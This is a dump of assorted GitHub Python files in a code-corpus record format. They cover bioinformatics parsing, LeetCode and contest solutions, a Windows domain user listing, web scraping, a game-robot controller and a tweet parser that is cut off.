hsp = {key: hsp_columns[key](value) for key, value in zip(field_names, line.rstrip('\\n').split('\\t'))}\n if hsp['compatible']: # Use compatible HSPs only (which pass the E-value cutoff)\n hsps.append(hsp)\n if hsps:\n hits.append(hsps2hit(hsps))\n\n # Write to file\n if not os.path.exists(f'out/{qspid}/'):\n os.makedirs(f'out/{qspid}/')\n\n with open(f'out/{qspid}/{sspid}.tsv', 'w') as file:\n file.write('\\t'.join(hit_columns) + '\\n')\n for hit in hits:\n file.write('\\t'.join([str(hit[column]) for column in hit_columns]) + '\\n')\n\n\ndef hsps2hit(hsps):\n # Calculate values from all HSPs\n hit = {key: hsps[0][key] for key in ['qppid', 'qgnid', 'sppid', 'sgnid', 'qlen', 'slen']}\n hit['chspnum'] = len(hsps)\n qcov = np.zeros((1, hsps[0]['qlen']), dtype=bool)\n scov = np.zeros((1, hsps[0]['slen']), dtype=bool)\n for hsp in hsps:\n qcov[0, hsp['qstart']-1:hsp['qend']] = True\n scov[0, hsp['sstart']-1:hsp['send']] = True\n hit['cnqa'] = qcov.sum()\n hit['cnsa'] = scov.sum()\n\n # Calculate values from disjoint HSPs only\n disjoint_hsps = [hsp for hsp in hsps if hsp['disjoint']]\n hit['hspnum'] = len(disjoint_hsps)\n hit['nqa'] = sum([hsp['qend'] - hsp['qstart'] + 1 for hsp in disjoint_hsps])\n hit['nsa'] = sum([hsp['send'] - hsp['sstart'] + 1 for hsp in disjoint_hsps])\n hit['bitscore'] = sum([hsp['bitscore'] for hsp in disjoint_hsps])\n\n return hit\n\n\ndef make_line2key(field_names):\n def line2key(line):\n fields = {key: value for key, value in zip(field_names, line.rstrip('\\n').split('\\t'))}\n return fields['qppid'], fields['sppid']\n return line2key\n\n\nhsp_columns = {'qppid': str, 'qgnid': str,\n 'sppid': str, 'sgnid': str,\n 'length': int, 'nident': int, 'gaps': int,\n 'qlen': int, 'qstart': int, 'qend': int,\n 'slen': int, 'sstart': int, 'send': int,\n 'evalue': float, 'bitscore': float,\n 'index_hsp': lambda x: x == 'True',\n 'disjoint': lambda x: x == 'True',\n 'compatible': lambda x: x == 'True'}\nhit_columns = ['qppid', 'qgnid',\n 'sppid', 'sgnid',\n 'hspnum', 'chspnum',\n 'qlen', 'nqa', 
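# note: per hsps2hit() above, the 'c'-prefixed fields (chspnum, cnqa, cnsa) count over all\n               # compatible HSPs, while hspnum/nqa/nsa and bitscore come from the disjoint HSPs only.\n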
'cnqa',\n               'slen', 'nsa', 'cnsa',\n               'bitscore']\nnum_processes = 2\n\n# Load genomes\nspids = []\nwith open('../config/genomes.tsv') as file:\n    field_names = file.readline().rstrip('\\n').split('\\t')\n    for line in file:\n        fields = {key: value for key, value in zip(field_names, line.rstrip('\\n').split('\\t'))}\n        spids.append(fields['spid'])\n\n# Parse HSPs\nif __name__ == '__main__':\n    with mp.Pool(processes=num_processes) as pool:\n        pool.starmap(parse_file, permutations(spids, 2))\n\n\"\"\"\nDEPENDENCIES\n../config/genomes.tsv\n../blast2hsps/blast2hsps.py\n    ../blast2hsps/out/hsps/*/*.tsv\n\"\"\"","repo_name":"marcsingleton/orthology_inference2023","sub_path":"analysis/ortho_search/hsps2hits/hsps2hits.py","file_name":"hsps2hits.py","file_ext":"py","file_size_in_byte":3457,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"11008563071","text":"from deeplearning.ml4pl.graphs import programl\nfrom deeplearning.ml4pl.graphs.unlabelled import (\n  unlabelled_graph_database_exporter,\n)\nfrom labm8.py import app\nfrom labm8.py import progress\n\napp.DEFINE_output_path(\n  \"outdir\",\n  \"/tmp/phd/ml4pl/graphs\",\n  \"The directory to write output files to.\",\n  is_dir=True,\n)\napp.DEFINE_enum(\n  \"fmt\",\n  programl.StdoutGraphFormat,\n  programl.StdoutGraphFormat.PB,\n  \"The file type for graphs to dump.\",\n)\napp.DEFINE_integer(\n  \"batch_size\",\n  1024,\n  \"Tuning parameter. The number of graphs to read in a batch.\",\n)\nFLAGS = app.FLAGS\n\n\ndef Main():\n  \"\"\"Main entry point.\"\"\"\n  exporter = unlabelled_graph_database_exporter.GraphDatabaseExporter(\n    db=FLAGS.proto_db(),\n    outdir=FLAGS.outdir,\n    fmt=FLAGS.fmt(),\n    batch_size=FLAGS.batch_size,\n  )\n\n  progress.Run(exporter)\n\n\nif __name__ == \"__main__\":\n  app.Run(Main)\n","repo_name":"ChrisCummins/phd","sub_path":"deeplearning/ml4pl/cmd/dump_unlabelled_graph_db.py","file_name":"dump_unlabelled_graph_db.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":181,"dataset":"github-code","pt":"67"} +{"seq_id":"31414321957","text":"class Solution:\n    def addStrings(self, num1, num2):\n        if len(num1) <= len(num2):\n            short_num, long_num = num1, num2\n        else:\n            short_num, long_num = num2, num1\n\n        sum_times = len(short_num)\n        result = ''\n        divisor = 0\n        for i in range(-1, -(sum_times+1), -1):\n            _sum = int(short_num[i]) + int(long_num[i]) + divisor\n\n            divisor = _sum // 10\n            remainder = _sum % 10\n\n            result = str(remainder) + result\n\n        # alternatively, the shorter string could simply be left-padded with zeros here to align the digits\n        for i in range(-(sum_times+1), -(len(long_num)+1), -1):\n            if divisor == 0:\n                return long_num[:i+1] + result\n            _sum = int(long_num[i]) + divisor\n\n            divisor = _sum // 10\n            remainder = _sum % 10\n\n            result = str(remainder) + result\n        if divisor != 0:\n            result = str(divisor) + result\n        return result\n\n\ns = Solution()\nprint(s.addStrings('3824008', '92520'))\nprint(s.addStrings('1', '9'))\n\n","repo_name":"yangwei-nlp/LeetCode-Python","sub_path":"LeetCode/tag字符串/415. 
字符串相加.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30228048242","text":"from collections import deque\n\n\ndef in_hole(pos, target):\n    return pos[0] == target[0] and pos[1] == target[1]\n\n\ndef in_boundary(r, c, board):\n    N = len(board)\n    M = len(board[0])\n\n    return 0 <= r < N and 0 <= c < M\n\n\ndef move_to_end(r, c, dr, dc, board):\n    nr, nc = r + dr, c + dc\n    counter = 0\n    while in_boundary(nr, nc, board) and board[nr][nc] == '.':\n        r, c = nr, nc\n        nr, nc = r + dr, c + dc\n        counter += 1\n\n    if in_boundary(nr, nc, board) and board[nr][nc] == 'O':\n        r, c = nr, nc\n\n    return r, c, counter\n\n\ndef move_ball(rr, rc, br, bc, dr, dc, board):\n    nrr, nrc, rcnt = move_to_end(rr, rc, dr, dc, board)\n    nbr, nbc, bcnt = move_to_end(br, bc, dr, dc, board)\n\n    if nrr == nbr and nrc == nbc:\n        if board[nrr][nrc] != 'O':\n            if rcnt > bcnt:\n                nrr, nrc = nrr - dr, nrc - dc\n            elif rcnt < bcnt:\n                nbr, nbc = nbr - dr, nbc - dc\n\n    return (nrr, nrc), (nbr, nbc)\n\n\ndef solution(board):\n    N = len(board)\n    M = len(board[0])\n\n    red_pos = tuple()\n    blue_pos = tuple()\n    hole_pos = tuple()\n\n    for r in range(N):\n        for c in range(M):\n            if board[r][c] == 'R':\n                red_pos = (r, c)\n                board[r][c] = '.'\n            elif board[r][c] == 'B':\n                blue_pos = (r, c)\n                board[r][c] = '.'\n            elif board[r][c] == 'O':\n                hole_pos = (r, c)\n\n    counter = 0\n    queue = deque([(red_pos, blue_pos, counter)])\n    visited = set()\n    blue_hole = False\n    while queue:\n        item = queue.popleft()\n        red_pos = item[0]\n        blue_pos = item[1]\n        counter = item[2]\n\n        if (red_pos, blue_pos) in visited:\n            continue\n        visited.add((red_pos, blue_pos))\n\n        # Break Case\n        if counter > 10:\n            return -1\n        if in_hole(blue_pos, hole_pos):\n            blue_hole = True\n            continue\n        if in_hole(red_pos, hole_pos) and not in_hole(blue_pos, hole_pos):\n            blue_hole = False\n            break\n\n        # D - U - R - L\n        for dr, dc in zip((1, -1, 0, 0), (0, 0, 1, -1)):\n            rr, rc = red_pos\n            br, bc = blue_pos\n\n            next_red_pos, next_blue_pos =\\\n                move_ball(rr, rc, br, bc, dr, dc, board)\n            item = (next_red_pos, next_blue_pos, counter+1)\n            queue.append(item)\n\n    rr, rc = red_pos\n    answer = counter if board[rr][rc] == 'O' and not blue_hole else -1\n    return answer\n\n\n# File Input\nif __name__ == \"__main__\":\n    board, answer = None, None\n\n    f = open('삼성 SW 역량 테스트 기출 문제/inputs/구슬 탈출 2.txt', 'r')\n    T = int(f.readline())\n\n    for t in range(T):\n        N, M = map(lambda x: int(x), f.readline().split())\n        board = [['.'] * M for _ in range(N)]\n        for r in range(N):\n            line = f.readline()\n            line = line.strip()\n            for c, val in enumerate(line):\n                board[r][c] = val\n        answer = int(f.readline())\n\n        my_answer = solution(board)\n        assert my_answer == answer\n        print(f'problem {t+1:02} passed')\n\n    f.close()\n\n# Standard Input for Submission\n# if __name__ == \"__main__\":\n#     N, M = map(lambda x: int(x), input().split())\n#     board = [list(input().rstrip()) for _ in range(N)]\n#     answer = solution(board)\n#     print(answer)\n","repo_name":"coco-in-bluemoon/baekjoon-online-judge","sub_path":"삼성 SW 역량 테스트 기출 문제/구슬 탈출 2.py","file_name":"구슬 탈출 2.py","file_ext":"py","file_size_in_byte":3375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"28729169409","text":"\"\"\"\nWindows domain-related operations\n\npython3.7\n\"\"\"\n\nimport subprocess\n\n\nclass Domain(object):\n    def __init__(self):\n        self.accounts = []\n\n    def obtain_accounts(self):\n        # get the list of domain accounts\n        result = subprocess.Popen('net users /domain', shell=True, 
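# note: stderr is merged into stdout so the whole 'net users /domain' listing arrives on\n                                 # one stream; the lines are decoded below as GBK (the simplified-Chinese Windows codepage).\n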
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n        result_lines = result.stdout.readlines()\n        for line in result_lines:\n            line = line.decode('gbk').strip()\n            # Windows' own output messages also contain single spaces, which we don't want;\n            # domain account names are separated by more than two spaces, so a double space\n            # marks the output lines we are actually after\n            if '  ' in line:\n                line_domains = [d for d in line.split() if d]\n                self.accounts += line_domains\n\n    def get_accounts(self):\n        return self.accounts\n\n    def print_account(self):\n        print(\"domain accounts: \")\n        print(self.accounts)\n\n\nif __name__ == '__main__':\n    ac = Domain()\n    ac.obtain_accounts()\n    ac.print_account()\n\n","repo_name":"alvinyeats/MiniScripts","sub_path":"windows/domain.py","file_name":"domain.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"24654282015","text":"import os\n\n# change to dir that holds the files\n\nos.chdir('/Users/jakks/Desktop/test')\nprint(os.getcwd())\n\nfor f in os.listdir():\n    file_name, file_ext = os.path.splitext(f)\n    print(file_name.split('-'))\n    var1, var2, var3 = file_name.split('-')\n    print(var1, var2, var3)","repo_name":"jakkrits/python-cookbook","sub_path":"0-File-Rename.py","file_name":"0-File-Rename.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"10287772116","text":"import unittest\nimport tempfile\nfrom .torch_dataset import TorchDataset \nfrom recordio import File\n\n\nclass TestTorchDataset(unittest.TestCase):\n    \"\"\" Test torch_dataset.py\n    \"\"\"\n\n    def test_dataset(self):\n        data_source = [\n            b'china',\n            b'usa',\n            b'russia',\n            b'india',\n            b'thailand',\n            b'finland',\n            b'france',\n            b'germany',\n            b'poland',\n            b'san marino',\n            b'sweden',\n            b'neuseeland',\n            b'argentina',\n            b'canada',\n            b'ottawa',\n            b'bogota',\n            b'panama',\n            b'united states',\n            b'brazil',\n            b'barbados']\n\n        # this tmp file will be closed in File.close()\n        tmpfile_name = tempfile.NamedTemporaryFile().name\n        with File(tmpfile_name, 'w') as rdio_w:\n            for data in data_source:\n                rdio_w.write(data)\n\n        with TorchDataset(tmpfile_name) as dataset:\n            self.assertEqual(list(dataset), list(data_source))\n\n\nif __name__ == '__main__':\n    unittest.main()\n","repo_name":"elasticdl/pyrecordio","sub_path":"recordio/torch_dataset/torch_dataset_test.py","file_name":"torch_dataset_test.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"14610674825","text":"PRIORITY = {\"*\": 3, \"/\": 3, \"+\": 2, \"-\": 2, \"(\": 1}\n\n\ndef brackets_trim(input_data: str) -> str:\n    return postfix_to_infix(infix_to_postfix(input_data))\n\n\ndef infix_to_postfix(expr):\n\n    stack = []\n    postfix_list = []\n    tokens = expr.replace(' ', '')\n\n    try:\n        for tkn in tokens:\n            if tkn.isalpha():\n                postfix_list.append(tkn)\n            elif tkn == '(':\n                stack.append(tkn)\n            elif tkn == ')':\n                top_tkn = stack.pop()\n                while top_tkn != '(':\n                    postfix_list.append(top_tkn)\n                    top_tkn = stack.pop()\n            elif tkn in PRIORITY.keys():\n                while len(stack) != 0 and PRIORITY[stack[-1]] >= PRIORITY[tkn]:\n                    postfix_list.append(stack.pop())\n                stack.append(tkn)\n    except IndexError:\n        return 'Check the correctness of the input expression.'\n\n    while len(stack) != 0:\n        postfix_list.append(stack.pop())\n\n    return ' '.join(postfix_list)\n\n\ndef postfix_to_infix(postfix_list):\n    stack = []\n\n    try:\n        for tkn in postfix_list:\n            if tkn.isalpha():\n                stack.append(tkn)\n            elif tkn in PRIORITY.keys():\n                operand2 = 
stack.pop()\n                operand1 = stack.pop()\n\n                # check PRIORITY\n                if is_operand_priority_lower(operand1, tkn, 1):\n                    operand1 = '( {} )'.format(operand1)\n                if is_operand_priority_lower(operand2, tkn, 2):\n                    operand2 = '( {} )'.format(operand2)\n\n                stack.append('{} {} {}'.format(operand1, tkn, operand2))\n\n        return stack.pop()\n\n    except IndexError:\n        return 'Check the correctness of the input expression.'\n\n\ndef is_operand_priority_lower(operand, operator, operand_num):\n    i = 0\n    while i < len(operand):\n        if operand[i] == '(':\n            while operand[i] != ')':\n                i += 1\n\n        if operand[i] in PRIORITY.keys():\n            if PRIORITY[operand[i]] < PRIORITY[operator]:\n                return True\n\n            elif operand_num == 2 and PRIORITY[operand[i]] == PRIORITY[operator]:\n                # case of - (-) or - (+). E.g. a-(b-c) or a-(b+c)\n                if operator == '-' and (operand[i] == '-' or operand[i] == '+'):\n                    return True\n                # case of / (*). E.g. a/(b*c)\n                elif operator == '/' and operand[i] == '*':\n                    return True\n        i += 1\n\n    return False\n\n\nif __name__ == '__main__':\n    print(brackets_trim(\"(x*y)+(j*z)+g\"))\n","repo_name":"annkupriyanova/epam_python_course","sub_path":"Iterators_Generators/hw4.py","file_name":"hw4.py","file_ext":"py","file_size_in_byte":2595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30834156211","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport time\nfrom Role import *\nfrom Move import movement\nfrom Choose import choose_workbench, free_ride_bussiness\n\n\nschedule = Schedule()\n\n\ndef start_task(job):\n    if job is None:\n        return\n    if job.speed_linear != robots[job.key[0]].speed_linear[0]:\n        robots[job.key[0]].forward(job.speed_linear)\n    if job.speed_angular != robots[job.key[0]].speed_angular:\n        robots[job.key[0]].rotate(job.speed_angular)\n\n\ndef stop_task(job):\n    if robots[job.key[0]].speed_linear != 0:\n        robots[job.key[0]].forward(0)\n    if robots[job.key[0]].speed_angular != 0:\n        robots[job.key[0]].rotate(0)\n\n\ndef clear_task(job):\n    del_all_request()\n\n\ndef process():\n    # log(collision_detection([robot.get_pos() for robot in robots]))\n    choose_workbench_time = 0\n    movement_time = 0\n    for robot in robots:\n        # if robot.rid != 0:\n        #     continue\n        if robot.is_busy():\n            '''correction phase'''\n            bid = robot.get_job()[0]\n            start = time.time()\n            start_time, stop_time, line_speed, angular_speed = movement(robot.rid, bid)\n            movement_time += time.time() - start\n            schedule.add_job(Job(frame_id, robot.rid, robot.get_job(), angular_speed, line_speed, start_task))\n            continue\n        # choose workbenches; a job has two stages in total\n        start = time.time()\n        job_1, job_2 = choose_workbench(robot.rid)\n        log(\"robot recv job : \" + str((job_1, job_2)))\n        choose_workbench_time += time.time() - start\n        if job_1 is None or job_2 is None:\n            schedule.add_job(Job(frame_id + 100, robot.rid, None, 0, 0, stop_task))\n            continue\n        # compute linear and angular speed and add the task; this covers the first stage\n        start = time.time()\n        start_time, stop_time, line_speed, angular_speed = movement(robot.rid, job_1[0])\n        movement_time += time.time() - start\n        schedule.add_job(Job(frame_id, robot.rid, job_1, angular_speed, line_speed, start_task))\n        robot.add_job([job_1, job_2])  # marks the robot as busy: entry 0 buys product x at bench_id1, entry 1 sells at bench_id2\n    if choose_workbench_time != 0:\n        log(\"choose_workbench() finished, elapsed: \" + str(choose_workbench_time))\n        log(\"movement() finished, elapsed: \" + str(movement_time))\n\n\ndef busy_to_idle_func(rid):\n    schedule.add_job(Job(frame_id, rid, None, math.pi / 4, 3, start_task))\n\n\ndef notify_product_update(bid, pid):\n    for robot in robots:\n        if robot.can_recv_job():\n            # log(str(robot.rid) + \" \" 
+ str(robot.get_final_bench_1()[0]) + \" \" + str(bid) + \" \" + str(pid))\n            job_1, job_2 = free_ride_bussiness(robot.rid, bid, pid)\n            if job_1 is None or job_2 is None:\n                continue\n            robot.insert_job([job_1, job_2], pos=1)\n            log(\"robot \" + str(robot.rid) + \" add new job, current job is : \" + str(robot.jobs))\n\n\ndef init_env():\n    graph = input_data()\n    log(\"initialization:\", True)\n    bw = graph_width / len(graph[0]) / 2.0\n    bench_id = 0\n    robot_id = 0\n    for x, line in enumerate(graph):\n        for y, ch in enumerate(line):\n            if ch.isdigit():\n                w = Workbench(bench_id, int(ch), 0.5 * y + bw, 49.75 - 0.5 * x, notify_product_update)\n                workbenches_category[int(ch)].append(bench_id)\n                workbenches.append(w)\n                bench_id += 1\n            elif \"A\" == ch:\n                robots.append(Robot(robot_id, 0.5 * y + bw, 49.75 - 0.5 * x, busy_to_idle_func))\n                robot_id += 1\n    for bi, bench in enumerate(bench_raw_map):\n        for pi in bench:\n            buyer[pi].extend(workbenches_category[bi])\n\n    for bid_1 in range(len(workbenches)):\n        bench_1 = workbenches[bid_1]\n        for bid_2 in range(bid_1 + 1, len(workbenches)):\n            bench_2 = workbenches[bid_2]\n            bench_bw_dis[(bench_1.bid, bench_2.bid)] = distance_o(bench_1.get_pos(), bench_2.get_pos())\n    schedule.add_job(Job((duration * 60 - 7) * fps, 74, 74, 0, 0, clear_task))\n    finish()\n\n\ndef input_data():\n    venue = []\n    while True:\n        line = sys.stdin.readline().strip('\\n')\n        if \"OK\" == line:\n            break\n        elif \"\" == line:\n            log(\"Total transaction times : \" + str(transactions_times))\n            sys.exit(0)\n        venue.append(line)\n    return venue\n\n\ndef update_venue(data):\n    global money, frame_id\n    parser_arr = list(map(int, data[0].split(\" \")))\n    frame_id, money = parser_arr[0], parser_arr[1]\n    bench_cnt = int(data[1])\n    line_cnt = 2\n    for index in range(bench_cnt):\n        parser_arr = list(map(float, data[line_cnt].split(\" \")))\n        workbenches[index].update(parser_arr)\n        line_cnt += 1\n    for index in range(robot_size):\n        parser_arr = list(map(float, data[line_cnt].split(\" \")))\n        robots[index].update(parser_arr)\n        line_cnt += 1\n\n\ndef output_result():\n    log(\"command output start---\")\n    sys.stdout.write('%d\\n' % frame_id)\n    log('%d' % frame_id)\n    for robot in robots:\n        for action, value in robot.action_list.items():\n            sys.stdout.write('%s %s\\n' % (action, ' '.join(str(v) for v in value)))\n            log('%s %s' % (action, ' '.join(str(v) for v in value)))\n        robot.action_list.clear()\n    finish()\n    log(\"command output end---\")\n\n\ndef finish():\n    sys.stdout.write('OK\\n')\n    sys.stdout.flush()\n\n\n# ----------------------------------------\n# main interaction loop logic\n# ----------------------------------------\ndef interact():\n    data = input_data()\n    start = time.time()\n    update_venue(data)\n    log(\"update_venue() finished, elapsed: \" + str(time.time() - start))\n    start = time.time()\n    log(\"frame %d:\" % frame_id)\n    s = \"workbenches needing to sell\"\n    for pid in request_form[0]:\n        s += \"\\npid: \" + str(pid) + \" bid: \"\n        for bid in request_form[0][pid]:\n            s += str(bid) + \" \"\n    s += \"\\nworkbenches needing to buy\"\n    for pid in request_form[1]:\n        s += \"\\npid: \" + str(pid) + \" bid: \"\n        for bid in request_form[1][pid]:\n            s += str(bid) + \" \"\n    log(s)\n    log(request_form)\n    # log(\"category_type_workbench :\" + str(\n    #     [[wb.bid for wb in workbenches_category[i]] for i in range(len(workbenches_category))]))\n    log(\"interval finished, elapsed: \" + str(time.time() - start))\n    start = time.time()\n    process()\n    log(\"process finished, elapsed: \" + str(time.time() - start))\n    schedule.running(frame_id)\n    output_result()\n    total = time.time() - start\n    log(\"total elapsed: \" + str(total))\n    if total > 0.0149:\n        log(\"timeout\")\n\n\ninit_env()\nwhile True:\n    
interact()\n# ----------------------------------------\n","repo_name":"LYFU0814/HUAWEI-Planck","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"10713897780","text":"\"\"\"\nGiven the head of a linked list, remove the nth node from the end of the list and return its head.\n\n \nExample 1:\n\nInput: head = [1,2,3,4,5], n = 2\nOutput: [1,2,3,5]\n\nExample 2:\n\nInput: head = [1], n = 1\nOutput: []\n\nExample 3:\n\nInput: head = [1,2], n = 1\nOutput: [1]\n \n\nConstraints:\nThe number of nodes in the list is sz.\n1 <= sz <= 30\n0 <= Node.val <= 100\n1 <= n <= sz\n\nFollow up: Could you do this in one pass?\n\"\"\"\n\n# Using 2 pointers\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def removeNthFromEnd(self, head: Optional[ListNode], n: int) -> Optional[ListNode]:\n # initialise 2 pointers\n fast = head\n slow = head\n # Set fast pointer to kth position\n # than the slow pointer \n for i in range(n):\n fast = fast.next\n \n # While the fast pointer is finished\n # The slow pointer will locate ate the position\n # where you'd like to remove\n while fast and fast.next:\n fast = fast.next\n slow = slow.next\n \n # fail to handle Example 2 and Example 3\n # I must ignored some condition\n slow.next = slow.next.next\n\n return head","repo_name":"Kaiyilin/LeetCode-Practice","sub_path":"two_pointers/RemoveNthNodeFromEndofList.py","file_name":"RemoveNthNodeFromEndofList.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"31271776170","text":"# -*- coding: utf-8 -*-\n\nfrom lib.Parse.parseData import ParseData\nfrom lxml import html\nfrom config.shops import shops\nimport re\n\nclass ShopGunData(ParseData):\n __slots__ = [\n \"categories\",\n \"availableAmmo\",\n \"url\",\n \"urlTmp\",\n \"dataFile\",\n \"shopName\"\n ]\n def __init__(self):\n settings = shops[\"shopgun\"]\n\n self.shopName = settings[\"shop_name\"]\n self.categories = settings[\"ammo_type\"]\n self.availableAmmo = settings[\"category\"]\n self.url = settings[\"url\"]\n self.urlTmp = settings[\"url_tmp\"]\n self.dataFile = settings[\"data_file\"]\n\n def getStructure(self, url):\n result = []\n page = self.requestsUrllib2Page(url)\n blocks = page.xpath('.//div[@class=\"product\"]')\n\n for item in blocks:\n dic = {}\n nameBlock = item.xpath('.//div[@class=\"name\"]/a/text()')\n priceBlock = item.xpath('.//span[@class=\"price\"]/text()')\n\n if priceBlock:\n price = priceBlock[0]\n name = nameBlock[0].replace('\\n', '')\n calcPrice = self.cleanPriceNum(price);\n\n dic[\"title\"] = self.cleanTitle(name)\n dic[\"price\"] = round(calcPrice, 2)\n\n result.append(\n dict(dic)\n )\n\n return sorted(result, key=self.sortArrayByPrice)\n ","repo_name":"IRIDON/ammo-bot","sub_path":"lib/Parse/shopGunParse.py","file_name":"shopGunParse.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"74339510613","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:\n '''\n You are given two non-empty linked lists representing two non-negative 
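# Hedged fix for RemoveNthNodeFromEndofList.py above: the record's closing
# comment flags unhandled cases -- the actual failure is removing the head
# itself (head=[1], n=1), where slow.next is already None. The usual one-pass
# repair is a dummy node in front of head, so `slow` always stops one node
# before the target. Standalone sketch, not the record's code:
class ListNode:
    def __init__(self, val=0, next=None):
        self.val = val
        self.next = next

def remove_nth_from_end(head, n):
    dummy = ListNode(0, head)
    fast = slow = dummy
    for _ in range(n):           # put fast n nodes ahead of slow
        fast = fast.next
    while fast.next:             # walk both until fast reaches the last node
        fast = fast.next
        slow = slow.next
    slow.next = slow.next.next   # slow now sits just before the node to unlink
    return dummy.next            # correct even when the old head was removed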
integers. \n The digits are stored in reverse order and each of their nodes contain a single digit. \n Add the two numbers and return it as a linked list.\n You may assume the two numbers do not contain any leading zero, except the number 0 itself. \n '''\n lst1=self.linklist2list(l1)\n lst1.reverse()\n s1=''.join(lst1)\n num1=int(s1)\n lst2=self.linklist2list(l2)\n lst2.reverse()\n s2=''.join(lst2)\n num2=int(s2)\n sumnum=num1+num2\n lstsum=list(str(sumnum))\n lstsum.reverse()\n lstsum=[int(x) for x in lstsum]\n result=self.list2linklist(lstsum)\n return result\n \n \n def linklist2list(self,l1:ListNode)->list:\n np=l1\n nl=[]\n nl.append(str(l1.val))\n while np.next!=None:\n nl.append(str(np.next.val))\n np=np.next\n return nl\n \n def list2linklist(self,l1:list)->ListNode:\n node=result=ListNode(l1[0])\n for i in range(len(l1)-1):\n nxnode=ListNode(l1[i+1])\n node.next=nxnode\n node=nxnode\n return result\n '''\n abstract:\n turn the linklist to a list then to a int by using str() and .reverse(),finally turn the result back to ListNode\n '''\n","repo_name":"EmperorKaiser/Leetcode-Solution-Notes","sub_path":"002_Add_Two_Numbers.py","file_name":"002_Add_Two_Numbers.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"72253055893","text":"import csv\n\n\ndef create_csv_for_2gis(goods: list):\n with open(\"classmates.csv\", mode=\"w\", encoding='utf-8') as csv_file:\n names = [\"name\", \"price\", \"category\", \"url\", \"picture\", \"description\"]\n file_writer = csv.DictWriter(csv_file, delimiter=\",\", lineterminator=\"\\r\", fieldnames=names)\n file_writer.writeheader()\n for good in goods:\n file_writer.writerow(good)\n # file_writer.writerow({\"Имя\": \"Вова\", \"Возраст\": \"14\"})\n\n\nif __name__ == '__main__':\n create_csv_for_2gis([\n {\"name\": \"Футболка\", \"price\": \"1\", \"category\": \"2\", \"url\": \"3\", \"description\": \"4\", \"picture\": \"5\"},\n ])\n","repo_name":"iparinile/backend_vinterr","sub_path":"helpers/csv/create_csv.py","file_name":"create_csv.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"33611621697","text":"import sys\nimport json\n\n#set the path to the raw tweets file\ntweets_data_path = './tweets_raw_backup copy'\n\n#initialize an array and open the raw tweets file for reading\ntweets_data = []\ntweets_file = open(tweets_data_path, \"r\")\n\n#process each line in raw tweets file\nfor line in tweets_file:\n try:\n tweet = json.loads(line)\n #Get \"real\" name then user name\n try: \n real_name = (tweet['user']['name'])\n except:\n real_name = \"UNKNOWN\"\n try:\n user_name = (tweet['user']['screen_name'])\n except:\n user_name = \"UNKNOWN\"\n #Get follower count to determine top users \n try:\n followers_count = (tweet['user']['followers_count'])\n except:\n followers_count = \"UNKNOWN\"\n #Get Verified flag for context\n try:\n verified_status = (tweet['user']['verified'])\n except:\n verified_status = \"UNKNOWN\"\n #Get tweet as well as identify possible retweet and mark it as such\n try:\n text = tweet['text']\n text_form = []\n text_form.append(text)\n if text[0:4] == \"RT @\":\n re_tweet = \"YES\"\n else:\n re_tweet = \"NO\"\n except:\n text_form = []\n re_tweet = \"UNKNOWN\"\n #Get language of tweet\n try:\n lang = tweet['lang']\n except:\n lang = \"UNKNOWN\"\n #Get hashtags of tweet \n try:\n hashtags = 
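# Hedged alternative to 002_Add_Two_Numbers.py above: that solution
# round-trips through Python's big ints via strings; the conventional
# one-pass version carries digit by digit instead, so it also maps onto
# languages without arbitrary-precision integers. Sketch only; ListNode
# mirrors the record's commented-out definition.
class ListNode:
    def __init__(self, x):
        self.val = x
        self.next = None

def add_two_numbers(l1, l2):
    dummy = tail = ListNode(0)
    carry = 0
    while l1 or l2 or carry:
        total = (l1.val if l1 else 0) + (l2.val if l2 else 0) + carry
        carry, digit = divmod(total, 10)   # e.g. 7 + 8 -> carry 1, digit 5
        tail.next = ListNode(digit)
        tail = tail.next
        l1 = l1.next if l1 else None
        l2 = l2.next if l2 else None
    return dummy.next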
